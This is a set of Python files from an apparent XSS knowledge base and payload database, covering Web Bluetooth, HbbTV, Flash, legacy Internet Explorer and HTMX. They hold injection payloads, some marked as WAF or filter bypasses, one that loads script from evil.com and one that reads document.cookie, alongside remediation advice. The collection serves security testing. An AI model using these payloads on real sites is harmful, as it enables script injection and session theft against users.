Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Knowledge Base: Web Bluetooth API XSS
"""

DETAILS = {
    "title": "Cross-Site Scripting (XSS) via Web Bluetooth API",
    "severity": "critical",
    "cvss_score": 8.8,
    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
    "reliability": "high",
    "cwe": ["CWE-79", "CWE-922"],
    "owasp": ["A03:2021"],
    "tags": ["xss", "bluetooth", "ble", "hardware", "chrome-56", "critical"],
    "description": """
Web Bluetooth API (Chrome 56+) allows web apps to communicate with Bluetooth devices.
XSS vulnerabilities occur when user input controls device selection, characteristic values,
or service UUIDs without validation.

SEVERITY: CRITICAL
Direct Bluetooth access can lead to device manipulation, data exfiltration, and privacy violations.
""",
    "attack_vector": """
WEB BLUETOOTH DEVICE SELECTION:
const device = await navigator.bluetooth.requestDevice({
  filters: [{ name: userInput }]  // XSS if name is controlled
});

WEB BLUETOOTH CHARACTERISTIC VALUE:
const device = await navigator.bluetooth.requestDevice({ filters: [] });
const server = await device.gatt.connect();
const service = await server.getPrimaryService('battery_service');
const characteristic = await service.getCharacteristic('battery_level');
const value = await characteristic.readValue();
const text = new TextDecoder().decode(value);
document.body.innerHTML = text;  // XSS if value contains HTML

WEB BLUETOOTH WRITE VALUE:
const value = new TextEncoder().encode(userInput);
await characteristic.writeValue(value);  // XSS if value is malicious

WEB BLUETOOTH SERVICE UUID:
const service = await server.getPrimaryService(userInput);  // XSS if UUID is controlled

WEB BLUETOOTH DESCRIPTOR:
const descriptor = await characteristic.getDescriptor(userInput);  // XSS
const value = await descriptor.readValue();
""",
    "remediation": """
DEFENSE:

1. Whitelist allowed Bluetooth service/characteristic UUIDs
2. Validate all characteristic values before display
3. Sanitize device names and descriptors
4. Restrict Web Bluetooth to trusted origins
5. Implement device access permissions

SAFE PATTERN:
const allowedServices = ['battery_service', 'device_information'];
if (!allowedServices.includes(userInput)) {
  throw new Error('Service not allowed');
}
const service = await server.getPrimaryService(userInput);

VALUE SANITIZATION:
const value = await characteristic.readValue();
const text = new TextDecoder().decode(value);
element.textContent = text;  // Safe
// Or
element.innerHTML = DOMPurify.sanitize(text);

OWASP REFERENCES:
- CWE-79: Cross-site Scripting
- CWE-922: Insecure Storage
- Web Bluetooth API Specification
""",
}



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2026-01-10 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Smart TV Context - HbbTV / Smart Apps
"""

DETAILS = {
    "title": "XSS in HbbTV and Smart TV Applications",
    "severity": "medium",
    "cvss_score": 6.5,
    "cvss_vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
    "cwe": ["CWE-79"],
    "owasp": ["A03:2021"],
    "description": (
        "Vulnerabilities in Hybrid Broadcast Broadband TV (HbbTV) standards and "
        "Smart TV web runtimes. HbbTV allows broadcast signals to trigger web content "
        "execution. Malicious DVB-T signals or compromised ad streams can inject "
        "XSS payloads into the TV's browser context."
    ),
    "attack_vector": (
        "Attacker injects a malicious AIT (Application Information Table) entry "
        "into a broadcast stream (requires physical proximity or compromised broadcaster). "
        "The TV parses the URL in the AIT and loads the payload. Or, XSS in a "
        "Smart TV app allows accessing local tuner APIs via `oipfObjectFactory`."
    ),
    "remediation": (
        "Validate AIT signatures. "
        "Sandboxing of HbbTV applications. "
        "Restrict access to sensitive OIPF (Open IPTV Forum) APIs."
    ),
    "references": [
        "https://www.hbbtv.org/resource-library/",
        "https://fahrplan.events.ccc.de/congress/2014/Fahrplan/events/6169.html",
    ],
    "tags": ["smart-tv", "hbbtv", "dvb", "broadcast", "oipf", "embedded"],
    "reliability": "low",
}



#!/usr/bin/env python3
# Project: BRS-KB
# Company: EasyProTech LLC (www.easypro.tech)
# Dev: Brabus
# Date: 2025-12-27 UTC
# Status: Refactored
# Telegram: https://t.me/EasyProTech

"""
Flash XSS Context (Legacy)

XSS through Adobe Flash SWF files (deprecated but still relevant for legacy systems).
"""

DETAILS = {
    "title": "Flash XSS (Legacy)",
    "severity": "high",
    "cvss_score": 7.5,
    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
    "reliability": "low",
    "cwe": ["CWE-79"],
    "owasp": ["A03:2021"],
    "tags": ["flash", "swf", "legacy", "actionscript", "xss"],
    "description": """
Flash XSS exploited ActionScript's ability to execute JavaScript via
ExternalInterface, getURL(), and navigateToURL(). While Flash is deprecated,
legacy systems and old SWF files may still be vulnerable. This context is
included for completeness and auditing legacy applications.
""",
    "attack_vector": """
FLASH XSS VECTORS (LEGACY):

1. EXTERNALINTERFACE.CALL()
   ExternalInterface.call("eval", "alert(1)")
   Calls JavaScript from ActionScript

2. GETURL() JAVASCRIPT
   getURL("javascript:alert(1)")
   Navigates to JavaScript URI

3. NAVIGATETOURL()
   navigateToURL(new URLRequest("javascript:alert(1)"))

4. FLASHVARS INJECTION
   <embed src="swf.swf" FlashVars="data=<script>alert(1)</script>">

5. LOCALCONNECTION
   Cross-SWF communication exploitation

6. CROSSDOMAIN.XML
   <cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>
   Allows any origin to read SWF data

7. SWF FILE UPLOAD
   Upload malicious SWF served from target domain

8. EMBEDDED FLASH
   <embed src="evil.swf"> in HTML

9. FLASH CSRF
   Cross-origin requests from ActionScript

10. EVAL-LIKE FUNCTIONS
    ActionScript dynamic code execution
""",
    "remediation": """
FLASH XSS PREVENTION:

1. REMOVE FLASH ENTIRELY
   Flash is end-of-life
   No security updates

2. UPGRADE TO HTML5
   Use Canvas, WebGL, WebAudio
   Modern video/animation APIs

3. IF UNAVOIDABLE
   Sanitize all FlashVars
   Validate parameters in ActionScript

4. RESTRICT CROSSDOMAIN.XML
   <cross-domain-policy>
     <allow-access-from domain="trusted.com"/>
   </cross-domain-policy>

5. ISOLATED DOMAIN
   Serve SWF from separate domain
   No cookies/auth on that domain
""",
}



#!/usr/bin/env python3

"""
Project: BRS-KB
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26

Internet Explorer Legacy XSS Payloads
For legacy IE/Edge browsers
"""

from ..models import PayloadEntry


IE_LEGACY_DATABASE = {
    # ===== CSS EXPRESSION =====
    "ie_expression_001": PayloadEntry(
        payload='<div style="width:expression(alert(1))">',
        contexts=["html_content", "css"],
        tags=["ie", "legacy", "expression"],
        severity="high",
        cvss_score=7.5,
        description="CSS expression (IE < 8)",
        reliability="low",
    ),
    "ie_expression_002": PayloadEntry(
        payload='<div style="background:url(javascript:alert(1))">',
        contexts=["html_content", "css"],
        tags=["ie", "legacy", "url"],
        severity="high",
        cvss_score=7.5,
        description="CSS url javascript (IE < 8)",
        reliability="low",
    ),
    # ===== BEHAVIOR =====
    "ie_behavior_001": PayloadEntry(
        payload='<div style="behavior:url(xss.htc)">',
        contexts=["html_content", "css"],
        tags=["ie", "legacy", "behavior"],
        severity="high",
        cvss_score=7.5,
        description="CSS behavior HTC",
        reliability="low",
    ),
    # ===== XSS FILTER BYPASS =====
    "ie_filter_001": PayloadEntry(
        payload="<script>a]ert(1)</script>",
        contexts=["html_content"],
        tags=["ie", "filter_bypass"],
        severity="high",
        cvss_score=7.5,
        description="XSS filter bypass ]",
        reliability="low",
    ),
    "ie_filter_002": PayloadEntry(
        payload="<script/src=//evil.com/x.js>",
        contexts=["html_content"],
        tags=["ie", "filter_bypass"],
        severity="high",
        cvss_score=7.5,
        description="XSS filter bypass /",
        reliability="low",
    ),
    # ===== DYNSRC =====
    "ie_dynsrc_001": PayloadEntry(
        payload="<img dynsrc=javascript:alert(1)>",
        contexts=["html_content"],
        tags=["ie", "legacy", "dynsrc"],
        severity="high",
        cvss_score=7.5,
        description="Img dynsrc (IE only)",
        reliability="low",
    ),
    # ===== LOWSRC =====
    "ie_lowsrc_001": PayloadEntry(
        payload="<img lowsrc=javascript:alert(1)>",
        contexts=["html_content"],
        tags=["ie", "legacy", "lowsrc"],
        severity="high",
        cvss_score=7.5,
        description="Img lowsrc (IE only)",
        reliability="low",
    ),
    # ===== BGSOUND =====
    "ie_bgsound_001": PayloadEntry(
        payload="<bgsound src=javascript:alert(1)>",
        contexts=["html_content"],
        tags=["ie", "legacy", "bgsound"],
        severity="high",
        cvss_score=7.5,
        description="Bgsound src (IE only)",
        reliability="low",
    ),
    # ===== DATA BINDING =====
    "ie_databind_001": PayloadEntry(
        payload="<xml id=x><a><b>alert(1)</b></a></xml><span datasrc=#x datafld=b dataformatas=html>",
        contexts=["html_content"],
        tags=["ie", "legacy", "databinding"],
        severity="high",
        cvss_score=7.5,
        description="Data binding XSS (IE)",
        reliability="low",
    ),
    # ===== VML =====
    "ie_vml_001": PayloadEntry(
        payload='<v:rect style="behavior:url(#default#vml)" onmouseover=alert(1)>',
        contexts=["html_content"],
        tags=["ie", "legacy", "vml"],
        severity="high",
        cvss_score=7.5,
        description="VML XSS (IE only)",
        reliability="low",
    ),
    # ===== CONDITIONAL COMMENTS =====
    "ie_conditional_001": PayloadEntry(
        payload="<!--[if gte IE 4]><script>alert(1)</script><![endif]-->",
        contexts=["html_content", "html_comment"],
        tags=["ie", "conditional", "comment"],
        severity="high",
        cvss_score=7.5,
        description="IE conditional comment",
        reliability="low",
    ),
    # ===== HTC FILE =====
    "ie_htc_001": PayloadEntry(
        payload='<public:attach event="onclick" onevent="alert(1)" />',
        contexts=["html_content"],
        tags=["ie", "htc"],
        severity="high",
        cvss_score=7.5,
        description="HTC file XSS",
        reliability="low",
    ),
    # ===== SCRIPTLET =====
    "ie_scriptlet_001": PayloadEntry(
        payload='<object classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389"><param name="url" value="javascript:alert(1)"></object>',
        contexts=["html_content"],
        tags=["ie", "scriptlet", "object"],
        severity="high",
        cvss_score=7.5,
        description="Scriptlet object XSS",
        reliability="low",
    ),
    # === OWASP IE/Legacy Payloads ===
    "owasp-img-dynsrc": PayloadEntry(
        payload="<IMG DYNSRC=\"javascript:alert('XSS')\">",
        contexts=["html_content"],
        tags=["owasp", "dynsrc", "ie-only", "legacy"],
        severity="medium",
        cvss_score=6.0,
        description="IMG DYNSRC - Internet Explorer only",
        reliability="low",
        browser_support=["ie"],
    ),
    "owasp-img-lowsrc": PayloadEntry(
        payload="<IMG LOWSRC=\"javascript:alert('XSS')\">",
        contexts=["html_content"],
        tags=["owasp", "lowsrc", "legacy"],
        severity="medium",
        cvss_score=6.0,
        description="IMG LOWSRC - legacy browsers",
        reliability="low",
    ),
    "owasp-bgsound": PayloadEntry(
        payload="<BGSOUND SRC=\"javascript:alert('XSS');\">",
        contexts=["html_content"],
        tags=["owasp", "bgsound", "ie-only", "legacy"],
        severity="medium",
        cvss_score=6.0,
        description="BGSOUND - Internet Explorer only",
        reliability="low",
        browser_support=["ie"],
    ),
    "owasp-style-expression": PayloadEntry(
        payload="<DIV STYLE=\"width: expression(alert('XSS'));\">",
        contexts=["html_content", "css"],
        tags=["owasp", "style", "expression", "ie-only"],
        severity="medium",
        cvss_score=6.0,
        description="CSS expression - IE only",
        reliability="low",
        browser_support=["ie"],
    ),
    "owasp-waf-applet": PayloadEntry(
        payload='<applet code="javascript:confirm(document.cookie);">',
        contexts=["html_content"],
        tags=["owasp", "waf_bypass", "applet", "legacy"],
        severity="medium",
        cvss_score=6.0,
        description="Applet tag with javascript - legacy",
        reliability="low",
        waf_evasion=True,
    ),
    "owasp-waf-isindex": PayloadEntry(
        payload='<isindex x="javascript:" onmouseover="alert(XSS)">',
        contexts=["html_content"],
        tags=["owasp", "waf_bypass", "isindex", "legacy"],
        severity="medium",
        cvss_score=6.0,
        description="Isindex tag with event - legacy",
        reliability="low",
        waf_evasion=True,
    ),
    "owasp-waf-style-expression": PayloadEntry(
        payload="<style>//*{x:expression(alert(/xss/))}//<style></style>",
        contexts=["html_content", "css"],
        tags=["owasp", "waf_bypass", "style", "expression"],
        severity="medium",
        cvss_score=6.0,
        description="Style expression with comments",
        reliability="low",
        waf_evasion=True,
        browser_support=["ie"],
    ),
    "owasp-object-classid": PayloadEntry(
        payload='<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>',
        contexts=["html_content"],
        tags=["owasp", "waf_bypass", "object", "classid", "ie-only"],
        severity="medium",
        cvss_score=6.0,
        description="OBJECT with CLASSID - IE only",
        reliability="low",
        waf_evasion=True,
        browser_support=["ie"],
    ),
    "owasp-vbscript-img": PayloadEntry(
        payload="<IMG SRC='vbscript:msgbox(\"XSS\")'>",
        contexts=["html_content"],
        tags=["owasp", "vbscript", "ie-only", "legacy"],
        severity="medium",
        cvss_score=6.0,
        description="VBScript in IMG - IE only",
        reliability="low",
        browser_support=["ie"],
    ),
    "owasp-downlevel-hidden": PayloadEntry(
        payload="<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->",
        contexts=["html_content"],
        tags=["owasp", "ie", "conditional", "legacy"],
        severity="medium",
        cvss_score=6.0,
        description="IE conditional comments",
        reliability="low",
        browser_support=["ie"],
    ),
    "owasp-htc-local": PayloadEntry(
        payload='<XSS STYLE="behavior: url(xss.htc);">',
        contexts=["html_content", "css"],
        tags=["owasp", "htc", "behavior", "ie-only"],
        severity="high",
        cvss_score=7.5,
        description="Local HTC file inclusion - IE only",
        reliability="low",
        browser_support=["ie"],
    ),
}

IE_LEGACY_TOTAL = len(IE_LEGACY_DATABASE)



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Active
Telegram: https://t.me/EasyProTech

HTMX Framework XSS Payloads
HTMX uses hx-* attributes for AJAX interactions that can be exploited.
"""

from ..models import Encoding, PayloadEntry, Reliability, Severity


HTMX_PAYLOADS = {
    # === hx-on Event Handlers ===
    "htmx-hx-on-click": PayloadEntry(
        payload='<button hx-on:click="alert(1)">Click</button>',
        contexts=["htmx", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTMX hx-on:click event handler",
        tags=["htmx", "framework", "hx-on", "event"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "htmx-hx-on-load": PayloadEntry(
        payload='<div hx-on:load="alert(1)" hx-trigger="load">XSS</div>',
        contexts=["htmx", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.0,
        description="HTMX hx-on:load auto-execution",
        tags=["htmx", "framework", "hx-on", "load", "auto"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "htmx-hx-on-htmx-load": PayloadEntry(
        payload='<div hx-on::load="alert(1)">XSS</div>',
        contexts=["htmx", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.0,
        description="HTMX hx-on::load (htmx:load event)",
        tags=["htmx", "framework", "hx-on", "htmx-event"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    # === hx-trigger Events ===
    "htmx-trigger-revealed": PayloadEntry(
        payload='<div hx-get="/x" hx-trigger="revealed" hx-on::before-request="alert(1)">XSS</div>',
        contexts=["htmx", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTMX revealed trigger with before-request event",
        tags=["htmx", "framework", "trigger", "revealed"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "htmx-trigger-intersect": PayloadEntry(
        payload='<div hx-get="/x" hx-trigger="intersect" hx-on::before-request="alert(1)">XSS</div>',
        contexts=["htmx", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTMX intersect trigger for viewport-based XSS",
        tags=["htmx", "framework", "trigger", "intersect"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "htmx-trigger-every": PayloadEntry(
        payload='<div hx-get="/x" hx-trigger="every 1s" hx-on::before-request="alert(1)">XSS</div>',
        contexts=["htmx", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTMX polling trigger for repeated XSS",
        tags=["htmx", "framework", "trigger", "polling"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    # === Response Processing ===
    "htmx-oob-swap": PayloadEntry(
        payload='<div hx-swap-oob="true" id="target"><img src=x onerror=alert(1)></div>',
        contexts=["htmx", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTMX out-of-band swap injection",
        tags=["htmx", "framework", "oob", "swap"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "htmx-response-script": PayloadEntry(
        payload="<script>alert(1)</script>",
        contexts=["htmx", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.0,
        description="HTMX response with script tag (if not sanitized)",
        tags=["htmx", "framework", "response", "script"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    # === hx-vals and hx-vars ===
    "htmx-hx-vals-injection": PayloadEntry(
        payload="<button hx-post=\"/x\" hx-vals='js:{x: alert(1)}'>Click</button>",
        contexts=["htmx", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTMX hx-vals JavaScript evaluation",
        tags=["htmx", "framework", "hx-vals", "js"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "htmx-hx-vars": PayloadEntry(
        payload='<button hx-post="/x" hx-vars="x:alert(1)">Click</button>',
        contexts=["htmx", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTMX hx-vars deprecated but still works",
        tags=["htmx", "framework", "hx-vars", "deprecated"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # === Extension Abuse ===
    "htmx-ext-client-side-templates": PayloadEntry(
        payload='<div hx-ext="client-side-templates" hx-get="/x" mustache-template><script>alert(1)</script></div>',
        contexts=["htmx", "html_content", "template"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTMX client-side-templates extension abuse",
        tags=["htmx", "framework", "extension", "template"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "htmx-ext-response-targets": PayloadEntry(
        payload='<div hx-ext="response-targets" hx-target-error="#err"><div id="err"></div></div>',
        contexts=["htmx", "html_content"],
        severity=Severity.MEDIUM,
        cvss_score=6.0,
        description="HTMX response-targets extension for error-based XSS",
        tags=["htmx", "framework", "extension", "error"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # === Custom Events ===
    "htmx-custom-event": PayloadEntry(
        payload='<div hx-on:myevent="alert(1)" id="t"></div><script>htmx.trigger("#t","myevent")</script>',
        contexts=["htmx", "html_content", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="HTMX custom event triggering",
        tags=["htmx", "framework", "custom-event", "trigger"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "htmx-htmx-config": PayloadEntry(
        payload='<meta name="htmx-config" content=\'{"selfRequestsOnly":false}\'>',
        contexts=["htmx", "html_content"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="HTMX config override for CSRF bypass",
        tags=["htmx", "framework", "config", "csrf"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # === Attribute Injection ===
    "htmx-attr-hx-get-js": PayloadEntry(
        payload='<div hx-get="javascript:alert(1)">XSS</div>',
        contexts=["htmx", "html_content", "url"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTMX hx-get with javascript protocol (older versions)",
        tags=["htmx", "framework", "hx-get", "protocol"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "htmx-hx-headers": PayloadEntry(
        payload='<div hx-get="/x" hx-headers=\'{"X-XSS": "<script>alert(1)</script>"}\'>XSS</div>',
        contexts=["htmx", "html_content", "header"],
        severity=Severity.MEDIUM,
        cvss_score=6.0,
        description="HTMX custom headers for header injection",
        tags=["htmx", "framework", "headers", "injection"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # === Hyperscript Integration ===
    "htmx-hyperscript": PayloadEntry(
        payload='<button _="on click call alert(1)">Click</button>',
        contexts=["htmx", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Hyperscript (HTMX companion) event handler",
        tags=["htmx", "hyperscript", "framework", "event"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "htmx-hyperscript-load": PayloadEntry(
        payload='<div _="on load call alert(1)">XSS</div>',
        contexts=["htmx", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.0,
        description="Hyperscript on load auto-execution",
        tags=["htmx", "hyperscript", "framework", "auto"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

HTMX_PAYLOADS_TOTAL = len(HTMX_PAYLOADS)
